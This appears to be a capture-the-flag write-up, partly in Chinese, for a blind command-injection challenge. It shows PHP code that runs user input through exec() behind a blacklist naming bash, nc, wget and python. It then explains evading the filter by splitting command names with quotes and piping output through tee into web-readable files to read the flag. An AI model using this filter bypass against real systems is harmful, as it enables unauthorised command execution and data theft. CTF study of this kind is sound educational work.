<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
$url=$_GET['url'];
if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
{
echo "Sorry,you can't use this.";
}
else
{
echo "Can you see anything?";
exec($url);
}
} 一道无回显RCE,nc,bash被禁用,反弹shell不考虑,$,php,python被禁二次RCE也不考虑
在linux中命令可以被''和""和/隔开但是却可以执行
l''s可以执行,用tee命令将ls输出流作为文件保存,l''s |tee 1.txt在访问1.txt得到目录,用tac /flllll''aaaaaaggggggg|tee 2.txt进行flag获取.
Comments NOTHING